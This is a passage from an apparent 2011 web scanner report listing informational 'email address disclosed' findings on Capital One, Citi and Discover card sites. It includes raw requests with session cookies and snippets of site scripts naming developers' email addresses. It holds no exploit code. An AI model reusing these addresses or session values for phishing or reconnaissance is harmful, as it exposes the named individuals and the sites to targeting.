Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_80=828974346.29215.0000; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:12 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 13:22:26 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 11:59:12 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1888
Content-Type: text/css

/*-----------------------------------------------------------------------------
Product Page Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Product Navigation
--------------------------------------------------------------------------------------------
...[SNIP]...

18.8. http://www.capitalone.com/css/portal_footer.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_footer.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/portal_footer.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_80=828974346.29215.0000; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:10 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 13:22:27 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 11:59:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1447
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Footer Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Global Footer
-------------------------------------------------------------------------------------------------
...[SNIP]...

18.9. http://www.capitalone.com/css/portal_header.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_header.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/portal_header.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_80=828974346.29215.0000; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:10 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 13:22:27 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 11:59:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 19495
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Header Base Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Header
----------------------------------------------------------------------------------------------------*/

...[SNIP]...

18.10. http://www.capitalone.com/css/portal_page-nav-heading.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_page-nav-heading.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/portal_page-nav-heading.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_80=828974346.29215.0000; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:10 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 13:22:27 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 11:59:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 5428
Content-Type: text/css

/*-----------------------------------------------------------------------------
Page Breadcrumb, Heading, and Secondary Navigation Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Breadcrumb
----------------------------------------------------------------------------------------------------
...[SNIP]...

18.11. http://www.capitalone.com/js/global/portal_cof.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/portal_cof.js

Issue detail

The following email address was disclosed in the response:

drew.diller@gmail.com

Request

GET /js/global/portal_cof.js HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_80=828974346.29215.0000; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:12 GMT
Server: Apache
Last-Modified: Thu, 10 Mar 2011 18:09:05 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 11:59:12 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 103153
Content-Type: application/x-javascript

// JavaScript Document
var Cof = Cof || {};

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.

...[SNIP]...
<IMG/>.
   * Author: Drew Diller
   * Email: drew.diller@gmail.com
   * URL: http://www.dillerdesign.com/experiment/DD_belatedPNG/
   * Version: 0.0.8a
   * Licensed under the MIT License: http://dillerdesign.com/experiment/DD_belatedPNG/#license
   *
   * Example usage:
   * DD
...[SNIP]...

18.12. https://www.citicards.com/cards/acq/Apply.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.citicards.com
Path:	/cards/acq/Apply.do

Issue detail

The following email addresses were disclosed in the response:

user@domain.com
username@domain.com

Request

Response

18.13. http://www.discovercard.com/scripts/src/discover/liveSearch.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.discovercard.com
Path:	/scripts/src/discover/liveSearch.js

Issue detail

The following email address was disclosed in the response:

mgirouard@mcdpartners.com

Request

GET /scripts/src/discover/liveSearch.js HTTP/1.1
Host: www.discovercard.com
Proxy-Connection: keep-alive
Referer: http://www.discovercard.com/customer-service/terms-of-use.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:05 GMT
Server: Apache
Last-Modified: Mon, 19 Oct 2009 04:59:47 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 16482
Content-Type: application/x-javascript

// If the dependencies are not found, throw an exception
if (typeof mcd === undefined || !mcd.dom || !mcd.event) {
   throw 'Can\'t initialize discover.liveSearch. mcd.dom and mcd.event are required d
...[SNIP]...
ists, create it
if (typeof discover === 'undefined') {
   var discover = {};
}

/**
* The Discover Live Search API
*
* @requires mcd.dom
* @requires mcd.event
* @author Michael Girouard (mgirouard@mcdpartners.com)
*/
discover.liveSearch = (function () {

   // ========================================================================
   // ===== Private API ===================================================
...[SNIP]...

18.14. http://www.discovercard.com/scripts/src/mcd/dom.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.discovercard.com
Path:	/scripts/src/mcd/dom.js

Issue detail

The following email address was disclosed in the response:

mgirouard@mcdpartners.com

Request

GET /scripts/src/mcd/dom.js HTTP/1.1
Host: www.discovercard.com
Proxy-Connection: keep-alive
Referer: http://www.discovercard.com/customer-service/terms-of-use.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:05 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 07:49:58 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 15367
Content-Type: application/x-javascript

/* Silently create the mcd namespace if it does not exist */
if (typeof mcd === 'undefined') {
   var mcd = {};
}

/**
* mcd-js DOM Utilities
*
* FYI: This is a module. http://yuiblog.com/blog/2007/06/12/module-pattern/
*
* @author Michael Girouard (mgirouard@mcdpartners.com)
*/
mcd.dom = function () {

   /**
    * Private member declarations
    * @private
    */
   var _this = {
       util : {
           trimStr : function (str) {
               return str.replace(/(^\s+|\s+$)/g, '');

...[SNIP]...

18.15. http://www.discovercard.com/scripts/src/mcd/event.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.discovercard.com
Path:	/scripts/src/mcd/event.js

Issue detail

The following email address was disclosed in the response:

mgirouard@mcdpartners.com

Request

GET /scripts/src/mcd/event.js HTTP/1.1
Host: www.discovercard.com
Proxy-Connection: keep-alive
Referer: http://www.discovercard.com/customer-service/terms-of-use.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:05 GMT
Server: Apache
Last-Modified: Tue, 29 Sep 2009 17:15:30 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 5394
Content-Type: application/x-javascript

/**
* mcd-js Event Utilities
*
* @author Michael Girouard (mgirouard@mcdpartners.com)
* @requires mcd.dom
*/
mcd.event = function () {

   var ELEMENT_INDEX = 0;
   var TYPE_INDEX = 1;
   var ACTION_INDEX = 2;
   var SCOPED_ACTION_INDEX = 3;

   var cachedAct
...[SNIP]...

18.16. https://www.discovercard.com/cardmembersvcs/acqs/app/exec previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/cardmembersvcs/acqs/app/exec

Issue detail

The following email address was disclosed in the response:

JLWebb@schoolname.edu

Request

Response

18.17. https://www.discovercard.com/cardmembersvcs/acqs/app/getapp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/cardmembersvcs/acqs/app/getapp

Issue detail

The following email address was disclosed in the response:

JLWebb@schoolname.edu

Request

Response

18.18. https://www.discovercard.com/discover/jscripts/acquisitions/discover/acqs/applicationForm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/discover/jscripts/acquisitions/discover/acqs/applicationForm.js

Issue detail

The following email address was disclosed in the response:

mikeg@mcdpartners.com

Request

GET /discover/jscripts/acquisitions/discover/acqs/applicationForm.js HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313791|session#1308313730257-773381#1308315591

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:56 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 14:32:49 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 16046
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

/**
* The acqs Application Controller and namespace
*
* @requires mcd.dom Used internally as $D
* @requires mcd.event Used internally as $E
* @author Michael Girouard (mikeg@mcdpartners.com)
*/
discover.acqs.applicationForm = function () {

   /**
    * Shortcut to mcd.dom
    * @private
    */
   var $D = mcd.dom;

   /**
    * Shortcut to mcd.event
    * @private
    */
   var $E = mcd.ev
...[SNIP]...

18.19. https://www.discovercard.com/discover/jscripts/acquisitions/discover/acqs/cardSelector.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/discover/jscripts/acquisitions/discover/acqs/cardSelector.js

Issue detail

The following email address was disclosed in the response:

mikeg@mcdpartners.com

Request

GET /discover/jscripts/acquisitions/discover/acqs/cardSelector.js HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313791|session#1308313730257-773381#1308315591

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:57 GMT
Server: Apache
Last-Modified: Fri, 06 Jun 2008 20:48:01 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 5555
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

/**
* The acqs Card Selector
*
* @author Michael Girouard (mikeg@mcdpartners.com)
*/
discover.acqs.cardSelector = function () {

   /**
    * Shortcut to mcd.dom
    * @private
    */
   var $D = mcd.dom;

   /**
    * Shortcut to mcd.event
    * @private
    */
   var $E = mcd.event
...[SNIP]...

18.20. https://www.discovercard.com/discover/jscripts/acquisitions/discover/acqs/rebuttalWindow.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/discover/jscripts/acquisitions/discover/acqs/rebuttalWindow.js

Issue detail

The following email address was disclosed in the response:

mikeg@mcdpartners.com

Request

GET /discover/jscripts/acquisitions/discover/acqs/rebuttalWindow.js HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313791|session#1308313730257-773381#1308315591

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:57 GMT
Server: Apache
Last-Modified: Tue, 01 Sep 2009 18:39:46 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 4712
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

/**
* The acqs Rebuttal Window Library
*
* @requires mcd.dom Used Internally as $D
* @requires mcd.event Used Internally as $E
* @author Michael Girouard (mikeg@mcdpartners.com)
*/
discover.acqs.rebuttalWindow = function () {

/**
* Shortcut to mcd.dom
* @private
*/
var $D = mcd.dom;

/**
* Shortcut to m
...[SNIP]...

18.21. https://www.discovercard.com/discover/stylesheets/acquisitions/overlay.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/discover/stylesheets/acquisitions/overlay.css

Issue detail

The following email address was disclosed in the response:

msmith@mcdpartners.com

Request

GET /discover/stylesheets/acquisitions/overlay.css HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:44 GMT
Server: Apache
Last-Modified: Thu, 04 Feb 2010 16:34:53 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 22798
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/css

/* Overlay Style Set
* @author    Michael T. Smith
* @email    msmith@mcdpartners.com
* @date    2008-June
* @descrip    These are template styles for all overlays
*            including Obtrusive and Regular overlays.
***************************/

/*
* Obtrusive Overlay Styles
****************
...[SNIP]...

18.22. https://www.discovercard.com/scripts/src/discover/universal-overlay.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/scripts/src/discover/universal-overlay.js

Issue detail

The following email address was disclosed in the response:

dcarlson@mcdpartners.com

Request

GET /scripts/src/discover/universal-overlay.js HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313791|session#1308313730257-773381#1308315591

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:55 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 05:25:48 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 5642
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

if(typeof(discover) === 'undefined') {
   var discover = {};
}

discover.universalOverlay = (function() {

   var _this = {

       visited : false,

       overlayUrl : "/includes/universal-cbb-overlay.html",

       /**
        * Requests universal CBB calendar overlay html file
        *
        * @author Dana Carlson (dcarlson@mcdpartners.com)
        */
       getHTML: function(){
           var config = {
               uri: _this.overlayUrl,
               onreadystatechange:    _this.xmlReady
           };

           xmlRequest = mcd.http.request(config);

           if (window.XMLHtt
...[SNIP]...

18.23. https://www.discovercard.com/scripts/src/mcd/dom.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/scripts/src/mcd/dom.js

Issue detail

The following email address was disclosed in the response:

mgirouard@mcdpartners.com

Request

GET /scripts/src/mcd/dom.js HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313791|session#1308313730257-773381#1308315591

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:53 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 07:49:58 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 15367
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

/* Silently create the mcd namespace if it does not exist */
if (typeof mcd === 'undefined') {
   var mcd = {};
}

/**
* mcd-js DOM Utilities
*
* FYI: This is a module. http://yuiblog.com/blog/2007/06/12/module-pattern/
*
* @author Michael Girouard (mgirouard@mcdpartners.com)
*/
mcd.dom = function () {

   /**
    * Private member declarations
    * @private
    */
   var _this = {
       util : {
           trimStr : function (str) {
               return str.replace(/(^\s+|\s+$)/g, '');

...[SNIP]...

18.24. https://www.discovercard.com/scripts/src/mcd/event.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/scripts/src/mcd/event.js

Issue detail

The following email address was disclosed in the response:

mgirouard@mcdpartners.com

Request

GET /scripts/src/mcd/event.js HTTP/1.1
